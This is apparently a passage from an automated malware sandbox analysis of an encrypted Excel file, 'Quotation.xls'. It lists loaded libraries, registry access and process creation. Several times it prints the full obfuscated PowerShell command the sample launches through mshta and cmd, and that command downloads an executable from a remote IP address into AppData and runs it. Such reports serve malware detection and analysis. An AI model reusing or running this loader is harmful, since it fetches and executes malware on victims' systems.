            Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: shcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: Quotation.xlsStatic file information: File size 1129472 > 1048576
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.pdb source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.pdbhPD source: powershell.exe, 00000007.00000002.449435147.0000000002623000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.pdbhPE source: powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.pdb source: powershell.exe, 00000013.00000002.483902193.00000000026CA000.00000004.00000800.00020000.00000000.sdmp
            Source: ~DF91B6A489623540E3.TMP.0.drInitial sample: OLE indicators vbamacros = False
            Source: Quotation.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            barindex
            PowerShell case anomaly found
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Suspicious command line found
            Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICA